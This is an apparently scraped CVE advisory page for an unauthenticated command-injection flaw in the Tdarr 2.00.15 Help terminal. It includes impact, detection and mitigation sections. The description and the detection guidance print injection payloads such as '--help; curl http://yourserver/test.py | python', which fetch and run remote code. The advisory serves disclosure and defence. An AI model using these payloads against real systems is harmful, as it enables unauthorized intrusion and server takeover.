CVE-2022-50919
Unknown Unknown - Not Provided
Unauthenticated Remote Code Execution in Tdarr 2.00.15 Help Terminal

Publication date: 2026-01-13

Last updated on: 2026-01-13

Assigner: VulnCheck

Description
Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-01-13
Last Modified
2026-01-13
Generated
2026-06-16
AI Q&A
2026-01-14
EPSS Evaluated
2026-06-15
NVD
CVE-2022-50919
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
tdarr tdarr From 2.00.15 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2022-50919 is a critical remote code execution vulnerability in Tdarr version 2.00.15. It exists in the Help terminal feature, which lacks proper input filtering and does not require authentication. Attackers can inject and chain arbitrary commands, such as using '--help; curl .py | python', to execute remote code on the server running Tdarr without any credentials. [1, 2]

Impact Analysis

This vulnerability allows unauthenticated remote attackers to execute arbitrary commands on the Tdarr server. This can lead to unauthorized access, execution of malicious scripts, spawning of reverse shells, and potential full compromise of the system hosting Tdarr. Sensitive information could be exposed or altered, and the server could be used as a foothold for further attacks. [1, 2]

Detection Guidance

This vulnerability can be detected by attempting to inject commands into the Tdarr Help terminal input and observing if arbitrary commands execute without authentication. For example, you can try commands like `--help; whoami` or `--help; curl http://yourserver/test.py | python` to see if the system executes them. Monitoring network traffic for unusual outbound connections initiated by Tdarr, such as unexpected curl requests, may also indicate exploitation attempts. [2]

Mitigation Strategies

Immediate mitigation steps include disabling or restricting access to the Tdarr Help terminal feature to prevent unauthenticated command injection. Applying any available patches or updates from the vendor that address this vulnerability is critical. Additionally, implementing network-level controls such as firewall rules to block unauthorized access to Tdarr services and monitoring for suspicious activity can help reduce risk until a fix is applied. [1, 2]

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2022-50919. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart